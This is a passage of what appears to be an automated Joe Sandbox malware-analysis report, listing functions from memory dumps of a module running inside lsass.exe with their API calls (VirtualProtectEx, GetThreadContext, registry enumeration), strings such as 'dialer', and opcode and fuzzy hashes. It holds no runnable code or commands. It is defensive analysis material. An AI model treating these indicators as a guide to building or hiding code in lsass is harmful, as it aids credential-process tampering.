Part of subcall function 000002D6F157B414: __GetUnwindTryBlock.LIBCMT ref: 000002D6F157B457
Part of subcall function 000002D6F157B414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002D6F157B47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002D6F157A679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002D6F157A8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 000002D6F157A9DA

Strings

csm, xrefs: 000002D6F157A69C
csm, xrefs: 000002D6F157A622
csm, xrefs: 000002D6F157A5BB

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: 0f6e5b8044e5d079d439375bd99d2ce9799423058a62ca4ea6fc09f96229a622
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: DAE16DB2604B488AEB609FA5E44E39D77A0F745BD8F148117EE8E57F99CB38C991C700

Function 000002D6F14E9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002D6F14E99A1

Part of subcall function 000002D6F14EA814: __GetUnwindTryBlock.LIBCMT ref: 000002D6F14EA857
Part of subcall function 000002D6F14EA814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002D6F14EA87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002D6F14E9A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002D6F14E9CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 000002D6F14E9DDA

Strings

csm, xrefs: 000002D6F14E99BB
csm, xrefs: 000002D6F14E9A22
csm, xrefs: 000002D6F14E9A9C

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: d823906c8357baff7e49bf9f9c1525c5136429e0f71f4035b6608ff5472b74b6
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: 11E16C72604B808EEB60DF65E49C39D77A0F795BD8F100516EE8A97F99CB38CA91C700

Function 000002D6F151F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 000002D6F151F510
GetProcAddress.KERNEL32 ref: 000002D6F151F51C

Strings

ext-ms-, xrefs: 000002D6F151F46D
api-ms-, xrefs: 000002D6F151F45A

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: 261ecf9bf2a1f0678fa278aa22b30c90f33c111913abcd05092592ff9b1f8fec
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: B44192A2311E409AEA1BCF26B84C7566395B749BE0F5941279D1FA7F84EE3CCC498350

Function 000002D6F157F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 000002D6F157F510
GetProcAddress.KERNEL32 ref: 000002D6F157F51C

Strings

api-ms-, xrefs: 000002D6F157F45A
ext-ms-, xrefs: 000002D6F157F46D

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: af9aaba1a7632fb24a63686b5a71bcd91d3a68279784362639626bcb4f06b3ab
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: 8F41B2A2325E149BEB1ACB16B90D7566392B745BE0F5981279D2F87F84EE3CCC458310

Function 000002D6F151104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002D6F15110B1
RegEnumValueW.ADVAPI32 ref: 000002D6F1511117
GetProcessHeap.KERNEL32 ref: 000002D6F151115A
HeapAlloc.KERNEL32 ref: 000002D6F1511168
GetProcessHeap.KERNEL32 ref: 000002D6F1511185
HeapFree.KERNEL32 ref: 000002D6F1511193

Strings

d, xrefs: 000002D6F15110D6

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: 7c308a324f3a3b915ae5c740d95f6965976605312a1237647059209b5cbc419f
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: AC413D73614F84CAEB61CF21E44879AB7A1F388B98F54811ADA8A17B58DF3CD945CB40

Function 000002D6F157104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002D6F15710B1
RegEnumValueW.ADVAPI32 ref: 000002D6F1571117
GetProcessHeap.KERNEL32 ref: 000002D6F157115A
HeapAlloc.KERNEL32 ref: 000002D6F1571168
GetProcessHeap.KERNEL32 ref: 000002D6F1571185
HeapFree.KERNEL32 ref: 000002D6F1571193

Strings

d, xrefs: 000002D6F15710D6

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: 1d423567965e06e969093779b1307c016526d9577681494677f4e632e54e6819
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: C8413E72214F84CAEB60CF21F45979A77A1F388B98F448116DA8A0BB58DF3CC945CB40

Function 000002D6F151D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D087
FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0A6
FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0CE
FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0DF
FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0F0

Strings

Y%, xrefs: 000002D6F151D0A6
1%, xrefs: 000002D6F151D0CE

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: 2480a359072ec50eb541e18d4b91d9545f280b7cfca78c1f54feae84ed9f0741
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: A61103E0705E444AFA6A5F36755E36962429B447F0F144727983F67EDAEE2CDC428600

Function 000002D6F157D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000002D6F157C7DE,?,?,?,?,?,?,?,?,000002D6F157CF9D,?,?,00000001), ref: 000002D6F157D087
FlsSetValue.KERNEL32(?,?,?,000002D6F157C7DE,?,?,?,?,?,?,?,?,000002D6F157CF9D,?,?,00000001), ref: 000002D6F157D0A6
FlsSetValue.KERNEL32(?,?,?,000002D6F157C7DE,?,?,?,?,?,?,?,?,000002D6F157CF9D,?,?,00000001), ref: 000002D6F157D0CE
FlsSetValue.KERNEL32(?,?,?,000002D6F157C7DE,?,?,?,?,?,?,?,?,000002D6F157CF9D,?,?,00000001), ref: 000002D6F157D0DF
FlsSetValue.KERNEL32(?,?,?,000002D6F157C7DE,?,?,?,?,?,?,?,?,000002D6F157CF9D,?,?,00000001), ref: 000002D6F157D0F0

Strings

Y%, xrefs: 000002D6F157D0A6
1%, xrefs: 000002D6F157D0CE

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: 1dadfff657a4208375519c7d841b61a8a2fc131f9ffb33344b07e82d8974b2af
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: FB1163E0704E4C49FA699736755F37961415B447F0F54D327A83F06EDAEE2DCC028600

Function 000002D6F1517510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002D6F1517538
__scrt_acquire_startup_lock.LIBCMT ref: 000002D6F151758A
_RTC_Initialize.LIBCMT ref: 000002D6F15175B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002D6F15175DE
__scrt_release_startup_lock.LIBCMT ref: 000002D6F1517609

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 9e9a13fecbd3ee6dd4b9af7d8544c3df26673650e91134e0a1763e142b039acf
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 8A81B0E1600E418EFB56AF6DB84D3992691A7857C0F544827AA0F67F97EB7CCC468700

Function 000002D6F1577510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002D6F1577538
__scrt_acquire_startup_lock.LIBCMT ref: 000002D6F157758A
_RTC_Initialize.LIBCMT ref: 000002D6F15775B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002D6F15775DE
__scrt_release_startup_lock.LIBCMT ref: 000002D6F1577609

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: ce5925644fadde1b738ab39b843e9ca717b849bd89ccf09029adfe775e7cf4c8
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 1881CFE1610F498EFB50AB69B44F3A96291A7857D0F54C4279E0F47F9AEB7CCC458700

Function 000002D6F1519DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000002D6F1519E49
GetLastError.KERNEL32 ref: 000002D6F1519E57
LoadLibraryExW.KERNEL32 ref: 000002D6F1519E81
FreeLibrary.KERNEL32 ref: 000002D6F1519EC7
GetProcAddress.KERNEL32 ref: 000002D6F1519ED3

Strings

api-ms-, xrefs: 000002D6F1519E69

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: 1b9a7946070453fa793877a5e81080cf6b3e7f40ad096b1fe8965e9392f62bd4
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: E331A3A2212E40EDEE17DF42F41C7552294B748BE4F590A269D2F1BB94EF3DC8858310

Function 000002D6F1579DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000002D6F1579E49
GetLastError.KERNEL32 ref: 000002D6F1579E57
LoadLibraryExW.KERNEL32 ref: 000002D6F1579E81
FreeLibrary.KERNEL32 ref: 000002D6F1579EC7
GetProcAddress.KERNEL32 ref: 000002D6F1579ED3

Strings

api-ms-, xrefs: 000002D6F1579E69

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: 5c6e5a0988f284c355c25f9168c8e8ac80771c20c2383100d83637de9ef712f0
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: A031C2A1212E45EDEF52DB02B81D7652294B748BF0F598A279D2F4BB91EF3DC8458320

Function 000002D6F1523DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002D6F1523DE5
GetLastError.KERNEL32 ref: 000002D6F1523DF1
CloseHandle.KERNEL32 ref: 000002D6F1523E09
CreateFileW.KERNEL32 ref: 000002D6F1523E34
WriteConsoleW.KERNEL32 ref: 000002D6F1523E53

Strings

CONOUT$, xrefs: 000002D6F1523E15

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: f7805de5885bb23c4ed2acbf2a3bac675694138274e2d29da4d1e0af9514ac00
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: D8112BA2210FC08AE7908B56F85D71966A0F788FE4F144226EE5F87B94DB7CC9158744

Function 000002D6F1583DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002D6F1583DE5
GetLastError.KERNEL32 ref: 000002D6F1583DF1
CloseHandle.KERNEL32 ref: 000002D6F1583E09
CreateFileW.KERNEL32 ref: 000002D6F1583E34
WriteConsoleW.KERNEL32 ref: 000002D6F1583E53

Strings

CONOUT$, xrefs: 000002D6F1583E15

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: ef32201bed05ea217f9e0437352787023a37fc37bf18c82b79ad9f0e35032b0e
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 93115BA1228F408BE7908B52F89C31966A0F788FF4F584226EA5F87B95CB3CC8148744

Function 000002D6F1513790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002D6F151379E
GetCurrentProcess.KERNEL32 ref: 000002D6F15137CC
VirtualProtectEx.KERNEL32 ref: 000002D6F15137EE
GetCurrentProcess.KERNEL32 ref: 000002D6F1513809
VirtualProtectEx.KERNEL32 ref: 000002D6F151382A

Strings

wr, xrefs: 000002D6F15137FF

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: 56a1fc91981ff5b9860e83c331195b973d21dc503a25c2b603b9cee17e6af388
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: FD1157AA705B81CAEF559F21F41C66962B0FB88BD5F44042ADE8E07B94EF3DCA05C704

Function 000002D6F1573790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002D6F157379E
GetCurrentProcess.KERNEL32 ref: 000002D6F15737CC
VirtualProtectEx.KERNEL32 ref: 000002D6F15737EE
GetCurrentProcess.KERNEL32 ref: 000002D6F1573809
VirtualProtectEx.KERNEL32 ref: 000002D6F157382A

Strings

wr, xrefs: 000002D6F15737FF

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: 4f6c9b040aad189fd952b8a9b6a6164ecf5b220afb35263a75ed92d83168b344
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: DB118BAA315B44CBEF549B21F40C269A6B0FB88BE5F04412ADE8E07B94EF3DC905C704

Function 000002D6F1515B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002D6F1515B6B
GetThreadContext.KERNEL32 ref: 000002D6F1515CD5

Part of subcall function 000002D6F1515960: GetCurrentThreadId.KERNEL32 ref: 000002D6F1515964

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction ID: 48f46886f9a4c9f0af87d4b559936913019cc1f1eed6d2fcc966534f28762692
Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction Fuzzy Hash: 76D187B6214F8889DA719F1AF49835A77A0F389BC4F104216EA8E57BA5DF7CC941CF40

Function 000002D6F1575B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002D6F1575B6B
GetThreadContext.KERNEL32 ref: 000002D6F1575CD5

Part of subcall function 000002D6F1575960: GetCurrentThreadId.KERNEL32 ref: 000002D6F1575964

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction ID: e5760c3603de52599fe3a25d6f3076f3f779b908cb67f5cb94bbf46be29a7f16
Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction Fuzzy Hash: 14D19AB6214F9889DA709B06F49935A77A0F388BD4F504117EA8E47BA9DF7CC941CF40

Function 000002D6F1512F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D6F1512F27
HeapAlloc.KERNEL32 ref: 000002D6F1512F3A
StrCmpNIW.SHLWAPI ref: 000002D6F1512FAF
GetProcessHeap.KERNEL32 ref: 000002D6F1513015
HeapFree.KERNEL32 ref: 000002D6F1513023

Strings

dialer, xrefs: 000002D6F1512FA8

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: 6f7c6b014d4bd7126e3bbbff313cacc6244a2be32cd63f79b011c0dee58239f0
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: F631CDA2301F918AEB56CF16F54C72A67A0FB44BC0F1880269E4E57F55EF3CD8A18300

Function 000002D6F1572F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D6F1572F27
HeapAlloc.KERNEL32 ref: 000002D6F1572F3A
StrCmpNIW.SHLWAPI ref: 000002D6F1572FAF
GetProcessHeap.KERNEL32 ref: 000002D6F1573015
HeapFree.KERNEL32 ref: 000002D6F1573023

Strings

dialer, xrefs: 000002D6F1572FA8

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: a0743bfa3e9f58e70318fe82f3fb098ba7e3a8dd59aa07676ac2cad6ad1ec82b
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: 613189A2711F598AEB55CF16F54E72A67A0FB44BD0F0880279E4E47F56EB3CC8A18300

Function 000002D6F15114A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D6F15114C5
HeapFree.KERNEL32 ref: 000002D6F15114D4
GetProcessHeap.KERNEL32 ref: 000002D6F15114E1
HeapFree.KERNEL32 ref: 000002D6F15114F0
GetProcessHeap.KERNEL32 ref: 000002D6F1511500

Strings

C:\Windows\system32\lsass.exe, xrefs: 000002D6F15261A9, 000002D6F15261B1

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Heap$Process$Free
String ID: C:\Windows\system32\lsass.exe
API String ID: 3168794593-3553486595
Opcode ID: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
Instruction ID: 4c3fb5dbda590ede340f70e239d951b1946e93fc28bd49ed613bd9f4bb13803d
Opcode Fuzzy Hash: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
Instruction Fuzzy Hash: 77219EEB509ED08EF651DF25B89D29D27A0F749BC4F194017DF4E93A43DA2DAC048700

Function 000002D6F151CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002D6F151CFAF
FlsSetValue.KERNEL32(?,?,?,000002D6F151D6B5,?,?,?,?,000002D6F151D778), ref: 000002D6F151CFE5
FlsSetValue.KERNEL32(?,?,?,000002D6F151D6B5,?,?,?,?,000002D6F151D778), ref: 000002D6F151D012
FlsSetValue.KERNEL32(?,?,?,000002D6F151D6B5,?,?,?,?,000002D6F151D778), ref: 000002D6F151D023
FlsSetValue.KERNEL32(?,?,?,000002D6F151D6B5,?,?,?,?,000002D6F151D778), ref: 000002D6F151D034
SetLastError.KERNEL32 ref: 000002D6F151D04F

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: 64ae360e53322a3fe6ae1786423e02a03aa622958712b9455162e794dcab319a
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: 931157E0301E804AFA6A9F35765D73952529B447F0F144717983F67FD6DE6DCC428600

Function 000002D6F157CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002D6F157CFAF
